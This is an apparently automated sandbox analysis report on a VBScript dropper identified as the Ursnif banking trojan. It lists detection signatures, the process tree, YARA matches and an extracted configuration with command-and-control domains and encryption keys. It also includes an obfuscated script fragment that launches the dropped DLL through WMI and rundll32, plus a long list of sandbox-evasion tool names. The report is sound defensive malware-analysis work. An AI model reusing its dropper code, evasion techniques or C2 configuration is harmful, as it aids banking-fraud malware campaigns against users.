Edit tour

Windows Analysis Report
gnAYDP69br2v.vbs

Overview

General Information

Sample Name:	gnAYDP69br2v.vbs
Analysis ID:	560537
MD5:	694a1a5ee37e5c161a37d4166a677850
SHA1:	adfdbca254f8f810735cf2224aca1630af762bea
SHA256:	0993c606df923ac8f174d7789fb494633c89d99d48747a91b866dc410cbd5814
Infos:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Benign windows process drops PE files

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Antivirus detection for dropped file

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Creates processes via WMI

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after checking system information)

Deletes itself after installation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

AV process strings found (often used to terminate AV products)

Java / VBScript file with very long strings (likely obfuscated code)

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Launches processes in debugging mode, may be used to hinder debugging

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6536 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

WmiPrvSE.exe (PID: 6620 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)

rundll32.exe (PID: 6788 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 6772 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "YH51zbw68XXolzw8uQmujXgr7vnasuZcFgH7AJ2kGBzL4PhjIyVzy5MDJsglBibg5h0RNR44WiefAtoK6SAdWueylFfdzQd683oCOk4rKCggPtdTeSl7hrve2I0aDaCBkoeiOxpSRC00pY0DaAjoBH1DxdU5ti0d0lMA4aqyGSJ+NcMQxJbjly/3eM1JgxTeRv8qfeoCn1t6fo9nKZliSXvxzEf8TXf46mNAineKBDDVsAYvylxjeMV9NuQnAN5bCZLiyp7C5x9eiMqtTEAUnFh9cMrGskg6XvfPGY7auFDj9EDMWtYHKhgHVdRDPVkTTSsGy44FUesZ+6Z4Xw7vU9rgofRZORY0rQQe0OFqz4s=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "gX5RILpAQgp3pEaS", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author
23.2.rundll32.exe.2ca0000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
23.3.rundll32.exe.4638d0f.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
23.2.rundll32.exe.4b694a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
23.2.rundll32.exe.6ffa0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
23.2.rundll32.exe.4b694a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "YH51zbw68XXolzw8uQmujXgr7vnasuZcFgH7AJ2kGBzL4PhjIyVzy5MDJsglBibg5h0RNR44WiefAtoK6SAdWueylFfdzQd683oCOk4rKCggPtdTeSl7hrve2I0aDaCBkoeiOxpSRC00pY0DaAjoBH1DxdU5ti0d0lMA4aqyGSJ+NcMQxJbjly/3eM1JgxTeRv8qfeoCn1t6fo9nKZliSXvxzEf8TXf46mNAineKBDDVsAYvylxjeMV9NuQnAN5bCZLiyp7C5x9eiMqtTEAUnFh9cMrGskg6XvfPGY7auFDj9EDMWtYHKhgHVdRDPVkTTSsGy44FUesZ+6Z4Xw7vU9rgofRZORY0rQQe0OFqz4s=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "gX5RILpAQgp3pEaS", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\melange.yuv

Avira: detection malicious, Label: TR/AD.UrsnifDropper.vsbvn

Source:

Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_7000EEA1 FindFirstFileExW,

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_6FFA2274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7000CA4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70003761

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 70002290 appears 34 times

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_6FFA14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_6FFA1B4A NtMapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_6FFA1382 GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_6FFA2495 NtQueryVirtualMemory,

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: gnAYDP69br2v.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
Source: unknown	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winVBS@6/2@0/0

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"

Source: gnAYDP69br2v.vbs

Static file information: File size 2488066 > 1048576

Source:

Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)REM feud policy theology irate liven comparator Ralph megavolt televise gift alarm cultivable javelin ovary Rufus craven bevy hunt ugly marrowbone magnetic End WithDim quadrupole: Set quadrupole = CreateObject("WScript.Shell")Dim Ijil: Set Ijil = CreateObject("Scripting.FileSystemObject")If (Ijil.FileExists(SvurK + "adobe.url")) Then' clubhouse turbulent delegate, 5083367 intend academia involution imperishable convulsion fee clandestine springtime stearic tibia condemnatory crook handkerchief orphanage tepid fence teapot ocph("DEBUG: F_LOCKFILE - False")ROpElseWith quadrupole.createShortcut(SvurK + "adobe.url").TargetPath = "https://adobe.com".Save()End Withocph("DEBUG: F_LOCKFILE - True")' salon Coddington fast McBride sunset February croft mannequin acuity purvey vindictive End IfEnd FunctionFunction weHra()ocph("DEBUG: F_RUN - Start")UuH=60000' strontium deoxyribose testicle carpetbagger thulium lye Silas standpoint confirm lavish ragging, raven broadloom collar moral, Mecca standard songbird Harlan earnest exfoliate soupy=40000RandomizeSet BYkLiService = GetObject("winmg" + "mts:Win32_Pro" + "cess")REM spill family towhead honeysuckle alkaloid. 4079355 wholesome usurpation sheath suffer oilmen whimsey emerald Morgan, 4462814 If (InStr(WScript.ScriptName, cStr(58462)) > 0 And sapsucker = 0) ThenChiangWith WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)End Witharchetype471 = "ca" + "lc.e" + "xe"' eft enormous Muzak Thor Polynesia pendant Dempsey contraception phosphide blockade belie clement covariant deadhead debilitate petrochemical amide BYkLiService.create archetype471ocph("DEBUG: F_RUN_T - True")ElseChiangWith WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)End WithUCTw = "rundll32" + " " + SvurK + "melange.yuv" + ",DllRegisterServer":BYkLiService.create UCTwocph("DEBUG: F_RUN_W - True")alLA("-")EMExEnd IfEnd FunctionFunction VuibL()ocph("DEBUG: FS_CLB - Start")' fortunate assonant atrophic absolution estimate lovelorn vegetate, plumb pappy stillwater schoolgirlish on error resume nextDim UuH,soupyREM saloon Pritchard sadden. indolent rancho Semite Harrington inflater stoneware bemadden. Rochester drake800 Shattuck UuH=5000soupy=2000RandomizeWScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)set BYkLi = GetObject("winmgmts:\\.\root\cimv2")' thunderflower niece mountaintop diverse roost putty duel compressible Buchenwald immutable Fomalhaut. 8154240 wont crowd carcass grownup dialectic taught curtain confederate invoke denouement set FtLaZ = BYkLi.InstancesOf("Win32_OperatingSystem")for each hSW in FtLaZaesthetic = hSW.LastBootUpTime' souvenir minuscule committal Havana heartbreak f cure helicopter tung Gorton, backorder Midwest jFE = Mid(aesthetic,1,4) & "-" & Mid(aesthetic,5,2) & "-" & Mid(aesthetic,7,2) & " " & Mid(aesthetic,9,2) & ":" & Mid(aesthetic,11,2) & ":" & Mid(aesthetic,13,2)monologistec = abs(datediff("s",jFE,now))ZuAV = monologistec \ 60REM hut orange copperhead selfadjoint clomp byline approximate t

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_6FFA2263 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_6FFA2210 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_700022D6 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70001C44 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7004C4C0 push ebx; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7004D302 push edx; ret

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_6FFA1A0A LoadLibraryA,GetProcAddress,

Source: melange.yuv.0.dr

Static PE information: real checksum: 0xab069 should be: 0xb1a89

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\melange.yuv

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\melange.yuv

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\gnaydp69br2v.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.739566081.00000274BF6FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXEICAL@
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXEH
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE

Found evasive API chain (may stop execution after checking system information)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep

Source: C:\Windows\System32\wscript.exe TID: 7144

Thread sleep time: -30000s >= -30000s

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 375

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\wscript.exe

